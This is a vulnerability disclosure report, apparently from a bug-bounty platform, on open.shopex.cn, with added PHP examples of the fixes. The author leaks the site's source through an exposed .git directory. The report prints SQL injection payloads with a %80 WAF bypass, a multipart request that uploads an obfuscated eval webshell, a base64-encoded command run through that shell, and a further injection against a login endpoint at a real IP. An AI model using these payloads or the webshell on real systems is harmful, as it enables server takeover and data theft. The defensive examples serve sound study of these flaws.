### Summary:
SQL injection.
### Details:
BBScan picked up a git information leak:
```
http://open.shopex.cn/.git/
```
Pulled the source down with rip-git.pl.
Auditing the source turned up a SQL injection:
open.shopex.cn\core\application\controllers\docs.php:
```php
/**
 * API search list page
 *
 * @access public
 *
 * @return void
 */
public function api_search($category_id){
    $this->data['navigations'][] = array('name'=>'开发文档','url'=>'');
    $this->data['navigations'][] = array('name'=>'API文档','url'=>site_url('/docs/api_list/'.$category_id));
    // All three values come straight from the query string, unvalidated
    $platform_id = isset($_GET['platform_id'])?$_GET['platform_id']:0;
    $docs_keyword = isset($_GET['docs_keyword'])?trim(urldecode($_GET['docs_keyword'])):'';
    $method_type_id = isset($_GET['method_type_id'])?$_GET['method_type_id']:0;
    /**
     *
     * Switch the layout for the developer docs page
     */
    $this->layout->Layout('doc_details');
    /**
     *
     * Load the API list model and fetch the API list data
     */
    $this->load->model('method_type_model');
    $api_list_data_temp = $this->method_type_model->get_api_list_all();
    foreach($api_list_data_temp as $k=>$v){
        $api_list_data[$v['id']] = $v;
    }
    $this->data['api_list_data'] = $api_list_data;
    /**
     *
     * Supported platform list
     */
    $this->load->model('platform_model');
    $platform_list = $this->platform_model->get_platform_list();
    $this->data['platform_list'] = $platform_list;
    /**
     *
     * Condition filtering
     */
    $conditions = '1=1';
    if($platform_id>0){
        // Raw concatenation into SQL: injection point 1
        $conditions.= ' AND pm.platform_id='.$platform_id;
    }
    if($docs_keyword!=''){
        // Raw concatenation inside LIKE: injection point 2
        $conditions.= ' AND (m.name like "%'.$docs_keyword.'%" OR m.introduction like "%'.$docs_keyword.'%")';
    }
    /**
     *
     * Used by the left-hand filter
     */
    $this->load->model('method_model');
    $filter_method_list = $this->method_model->get_method_search_list($conditions);// method list
    $method_type_id_array = array();
    foreach($filter_method_list as $k=>$v){
        $method_type_id_array[] = $v['method_type_id'];
    }
    if($method_type_id>0){
        // Raw concatenation into SQL: injection point 3
        $conditions.= ' AND mthm.method_type_id='.$method_type_id;
    }
    /**
     *
     * Load the API method model
     */
    $this->load->model('method_model');
    $method_list_temp = $this->method_model->get_method_search_list($conditions);// method list
    foreach($method_list_temp as $k=>$v){
        $temp = isset($api_list_data[$v['method_type_id']])?$api_list_data[$v['method_type_id']]['name']:'temp';
        $method_list_group[$temp][] = $v;
    }
    $this->data['method_list_group'] = $method_list_group;
    $this->data['method_type_id_array'] = $method_type_id_array;
    $this->data['docs_keyword'] = $docs_keyword;
    $this->data['platform_id'] = $platform_id;
    $this->data['category_id'] = $category_id;
    $this->data['method_type_id'] = $method_type_id;// current list ID
    $this->layout->view('docs/api_search',$this->data);
}
```
Three parameters are injectable:
```
platform_id docs_keyword method_type_id
```
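For contrast, here is how the filter-building part of `api_search()` looks when request values are bound instead of concatenated. This is an added example, not open.shopex.cn's code: the column aliases (`pm.platform_id`, `m.name`, `m.introduction`, `mthm.method_type_id`) follow the vulnerable snippet, while the three-table SQLite schema in `demo()` is an assumption made so the script runs on its own (PHP 7.1+ with pdo_sqlite). `build_search_conditions()` returns a `[$sql, $binds]` pair, which in CodeIgniter can be handed to `$this->db->query($sql, $binds)`.

```php
<?php
// Added example (not the site's code): api_search() filter construction with
// bound parameters. Integer inputs are cast, the keyword is a bound LIKE
// pattern, so no request value is ever spliced into the SQL text.

/**
 * Build the WHERE clause for api_search(). Returns [$whereSql, $binds].
 * (int) casts turn "1 OR 1=1" into 1; the keyword's %, _ and ! are escaped
 * so the search term is matched literally.
 */
function build_search_conditions(array $get): array
{
    $platformId   = isset($get['platform_id'])    ? (int) $get['platform_id']    : 0;
    $methodTypeId = isset($get['method_type_id']) ? (int) $get['method_type_id'] : 0;
    $keyword      = isset($get['docs_keyword'])   ? trim((string) $get['docs_keyword']) : '';

    $where = ['1=1'];
    $binds = [];
    if ($platformId > 0) {
        $where[] = 'pm.platform_id = ?';
        $binds[] = $platformId;
    }
    if ($keyword !== '') {
        // "!" is declared as the LIKE escape character below; escape it and both wildcards.
        $pattern = '%' . str_replace(['!', '%', '_'], ['!!', '!%', '!_'], $keyword) . '%';
        $where[] = "(m.name LIKE ? ESCAPE '!' OR m.introduction LIKE ? ESCAPE '!')";
        $binds[] = $pattern;
        $binds[] = $pattern;
    }
    if ($methodTypeId > 0) {
        $where[] = 'mthm.method_type_id = ?';
        $binds[] = $methodTypeId;
    }
    return [implode(' AND ', $where), $binds];
}

/** Run the search for one query-string array against the demo schema. */
function run_search(PDO $pdo, array $get): array
{
    [$where, $binds] = build_search_conditions($get);
    $sql = 'SELECT m.name FROM method m'
         . ' JOIN platform_method pm ON pm.method_id = m.id'
         . ' JOIN method_type_method mthm ON mthm.method_id = m.id'
         . ' WHERE ' . $where;
    $stmt = $pdo->prepare($sql);
    $stmt->execute($binds);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

/** Assumed minimal schema and constructed rows; only needed for the stand-alone run. */
function demo(): array
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE method (id INTEGER, name TEXT, introduction TEXT)');
    $pdo->exec('CREATE TABLE platform_method (method_id INTEGER, platform_id INTEGER)');
    $pdo->exec('CREATE TABLE method_type_method (method_id INTEGER, method_type_id INTEGER)');
    $pdo->exec("INSERT INTO method VALUES (1, 'order.get', 'Fetch one order'), (2, 'item.list', 'List items')");
    $pdo->exec('INSERT INTO platform_method VALUES (1, 1), (2, 2)');
    $pdo->exec('INSERT INTO method_type_method VALUES (1, 3), (2, 4)');

    return [
        'normal'  => run_search($pdo, ['platform_id' => '1', 'docs_keyword' => 'order']),
        // Same shape as the report's inputs: the ints collapse to 1 and 3,
        // the keyword is matched as a literal string.
        'hostile' => run_search($pdo, [
            'platform_id'    => '1 OR 1=1',
            'docs_keyword'   => '%" OR "1"="1',
            'method_type_id' => '3 OR 1=1',
        ]),
    ];
}

print_r(demo());
```

The ordinary search returns the matching method name; the hostile inputs are reduced to platform 1, method type 3 and a keyword that contains no wildcard, so the extra clauses never reach the parser as SQL. The `ESCAPE '!'` form is used rather than a backslash because MySQL and SQLite treat a backslash inside a string literal differently, and `!` behaves the same in both.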
A quick search shows it has already been reported:
[WooYun: SQL injection in the Shopex open platform](http://www.wooyun.org/bugs/wooyun-2014-088313)
[WooYun: A SQL injection vulnerability in a Shopex platform](http://www.wooyun.org/bugs/wooyun-2015-0114559)
[WooYun: Injection on a ShopEx subsite](http://www.wooyun.org/bugs/wooyun-2015-0115779)
The vulnerability still has not been fixed, but a WAF has been put in front of it.
The application is built on the CI framework, which by default strips bytes that are not valid UTF-8 from request parameters, so inserting a %80 into the keyword is enough to bypass the WAF.
```
http://open.shopex.cn/docs/api_search/1?platform_id=1/extractvalue(1,concat%20(0x7e,us%80er(),0x3a,ver%80sion()))%23
```
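The bypass works because the WAF and the application disagree about what the parameter contains. CodeIgniter's input cleaning removes invalid UTF-8 sequences when UTF-8 support is enabled, so the database receives `user()` where the WAF saw `us\x80er()`. The script below is an added illustration, not CodeIgniter's or the site's code: `strip_invalid_utf8()` approximates the framework's cleaning with mbstring, and `looks_like_sql_function_call()` is an illustrative toy signature, not any real WAF rule. It shows that a filter has to inspect the value in the same normalised form the application will actually use.

```php
<?php
// Added example (not the site's or CodeIgniter's code): the normalisation gap
// behind the %80 trick. Requires the mbstring extension.

/**
 * Drop bytes that do not form valid UTF-8, approximating what CodeIgniter's
 * input cleaning does before the controller sees the value.
 */
function strip_invalid_utf8(string $s): string
{
    $previous = mb_substitute_character();
    mb_substitute_character('none');          // remove, rather than replace, bad bytes
    $clean = mb_convert_encoding($s, 'UTF-8', 'UTF-8');
    mb_substitute_character($previous);
    return $clean;
}

/** Toy signature standing in for a WAF rule (illustrative only). */
function looks_like_sql_function_call(string $s): bool
{
    return (bool) preg_match('/\b(user|version|database)\s*\(/i', $s);
}

/**
 * Inspect one raw query-string value the way a WAF would (decoded bytes) and
 * the way the application would (after UTF-8 cleaning).
 * Returns ['raw_flagged' => bool, 'normalized_flagged' => bool, 'reaches_sql' => string].
 */
function inspect(string $rawParam): array
{
    $decoded    = rawurldecode($rawParam);       // what PHP places in $_GET
    $normalized = strip_invalid_utf8($decoded);  // what the controller receives
    return [
        'raw_flagged'        => looks_like_sql_function_call($decoded),
        'normalized_flagged' => looks_like_sql_function_call($normalized),
        'reaches_sql'        => $normalized,
    ];
}

// Constructed sample in the same shape as the report's query string.
print_r(inspect('1/extractvalue(1,concat%20(0x7e,us%80er(),0x3a,ver%80sion()))%23'));
```

Run on the sample, `raw_flagged` is false while `normalized_flagged` is true, and `reaches_sql` shows the cleaned text with `user()` and `version()` intact. A WAF that decodes and normalises exactly as the application does closes this particular gap, but the fix that does not depend on matching the framework's behaviour byte for byte is the parameterised query: once `platform_id` is cast to an integer the value `1/extractvalue(...)` simply becomes `1`.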
[![1.png](https://images.seebug.org/upload/201512/122210195190a28293aef4521fe54577e9e384b6.png)](https://images.seebug.org/upload/201512/122210195190a28293aef4521fe54577e9e384b6.png)
[![2.png](https://images.seebug.org/upload/201512/1222120536af2f1c1bdb613516cb2ca4d054da28.png)](https://images.seebug.org/upload/201512/1222120536af2f1c1bdb613516cb2ca4d054da28.png)
Digging further through the code, there is also an arbitrary file upload:
open.shopex.cn\core\application\controllers\uploads.php:
```php
class Uploads extends CI_Controller {
    /**
     * Home page image upload
     *
     * @access public
     */
    public function home_img(){
        if(empty($_FILES['image'])){
            $this->_return_msg('fail','上传内容格式不对!');
        }
        // Only the client-supplied Content-Type of the part is checked
        if(substr($_FILES['image']['type'],0,5)!='image'){
            $this->_return_msg('fail','请确认上传的是图片!');
        }
        // The extension is taken verbatim from the client-supplied file name
        $image_name = $_FILES['image']['name'];
        $image_name_exp = explode('.',$image_name);
        $image_name = date('YmdHis').mt_rand(0,1).'.'.$image_name_exp[1];
        $uploadfile = FCPATH.'uploads/home_img/'.$image_name;
        move_uploaded_file($_FILES['image']['tmp_name'],$uploadfile);
        $data['img'] = base_url('/uploads/home_img/'.$image_name);
        $this->_return_msg('succ','成功',$data);
    }
    // ...
```
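Two things make `home_img()` an arbitrary upload: the type check reads `$_FILES['image']['type']`, which is just the `Content-Type` the client wrote into the multipart part, and the stored extension is `explode('.', $name)[1]`, taken from the client's file name. The following is an added example, not the site's code, of the checks a hardened version would perform: decide the type from the file's bytes (`getimagesize()`), take the extension from that detected type, and give the file a random server-chosen name. `store_image_upload()` is the drop-in shape for the controller; `demo()` exercises the content check on two constructed temporary files (a real 1x1 GIF and a PHP payload).

```php
<?php
// Added example (not the site's code): upload validation that trusts neither
// the client's Content-Type nor the client's file name.

const ALLOWED_IMAGE_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

/**
 * Inspect the *content* of a file on disk.
 * Returns ['ok' => bool, 'reason' => string, 'ext' => string|null]; the
 * extension is derived from the decoded image type only.
 */
function inspect_image_file(string $path): array
{
    $info = @getimagesize($path);          // false unless a real image header is present
    if ($info === false || !isset($info['mime'])) {
        return ['ok' => false, 'reason' => 'not a decodable image', 'ext' => null];
    }
    if (!isset(ALLOWED_IMAGE_TYPES[$info['mime']])) {
        return ['ok' => false, 'reason' => 'image type not allowed: ' . $info['mime'], 'ext' => null];
    }
    return ['ok' => true, 'reason' => '', 'ext' => ALLOWED_IMAGE_TYPES[$info['mime']]];
}

/** Random server-chosen name; nothing from the client's file name reaches disk. */
function safe_image_name(string $ext): string
{
    return date('YmdHis') . '_' . bin2hex(random_bytes(8)) . '.' . $ext;
}

/**
 * Replacement for the body of home_img(): every check, then the move.
 * $uploadDir should be served as static files only, with no PHP handler.
 */
function store_image_upload(array $file, string $uploadDir): array
{
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        return ['ok' => false, 'reason' => 'upload failed', 'name' => null];
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        return ['ok' => false, 'reason' => 'not an uploaded file', 'name' => null];
    }
    $check = inspect_image_file($file['tmp_name']);
    if (!$check['ok']) {
        return ['ok' => false, 'reason' => $check['reason'], 'name' => null];
    }
    $name = safe_image_name($check['ext']);
    if (!move_uploaded_file($file['tmp_name'], rtrim($uploadDir, '/') . '/' . $name)) {
        return ['ok' => false, 'reason' => 'could not store file', 'name' => null];
    }
    return ['ok' => true, 'reason' => '', 'name' => $name];
}

/** Stand-alone check with constructed inputs (a 1x1 GIF and a PHP payload). */
function demo(): array
{
    $gif = tempnam(sys_get_temp_dir(), 'up');
    file_put_contents($gif, base64_decode('R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7'));
    $php = tempnam(sys_get_temp_dir(), 'up');
    file_put_contents($php, "<?php echo 'not an image'; ?>");

    $out = [
        'real gif'     => inspect_image_file($gif),
        'php as image' => inspect_image_file($php),
    ];
    unlink($gif);
    unlink($php);
    return $out;
}

print_r(demo());
```

The GIF passes with `ext` set to `gif`; the PHP file is rejected as not decodable regardless of what file name or `Content-Type` accompanied it, which is the property the multipart trick in the request below relies on being absent. Keeping the upload directory free of any script handler is the second, independent layer: even a mistake in the content check then yields a static file rather than code execution.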
Use the PHP multipart/form-data parsing bug to get past the WAF and upload a PHP shell:
```
POST /index.php/uploads/home_img HTTP/1.1
User-Agent: curl/7.33.0
Host: open.shopex.cn
Accept: */*
Proxy-Connection: Keep-Alive
Content-Length: 341
Content-Type: multipart/form-data; boundary=----,xxoo
------,xxoo
Content-Disposition: form-data; name="image"; filename="1.jpg"
Content-Type: image/png
------
Content-Disposition: form-data; name="image"; filename="1.php"
Content-Type: image/png
<script language="php">@preg_replace('/./e','@'.str_rot13('riny').'(bas'.'e64_decode($_POST[c]))', 'x');</script>
------
------,xxoo--
```
Shell:
```
http://open.shopex.cn/uploads/home_img/201512122130440.php
```
```
POST /uploads/home_img/201512122130440.php HTTP/1.1
User-Agent: curl/7.33.0
Host: open.shopex.cn
Accept: */*
Proxy-Connection: Keep-Alive
Content-Length: 34
Content-Type: application/x-www-form-urlencoded
c=ZWNobyBgaWQ7cHdkO2xhc3QgLTIwYDs=
```
[![3.png](https://images.seebug.org/upload/201512/1222175044b7a1af0175248b111c6bb3faaa0083.png)](https://images.seebug.org/upload/201512/1222175044b7a1af0175248b111c6bb3faaa0083.png)
There is one more SQL injection as well:
```
POST /index.php/passport/passport/login HTTP/1.1
Host: 122.144.135.142
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=368fe31461cc0ba9a3e38c0334145b35; CNZZDATA3868185=cnzz_eid%3D1466070748-1449902718-%26ntime%3D1449902718
Content-Length: 131
biz_id=&entid=')or updatexml(1,co%80ncat(0x7e,us%80er(),ver%80sion()),1)#&pwd=xx&auth_code=cqac&subOk=%E7%99%BB%E5%BD%95&logOk=true
```
### Proof of vulnerability:
See screenshots 1.png, 2.png and 3.png above.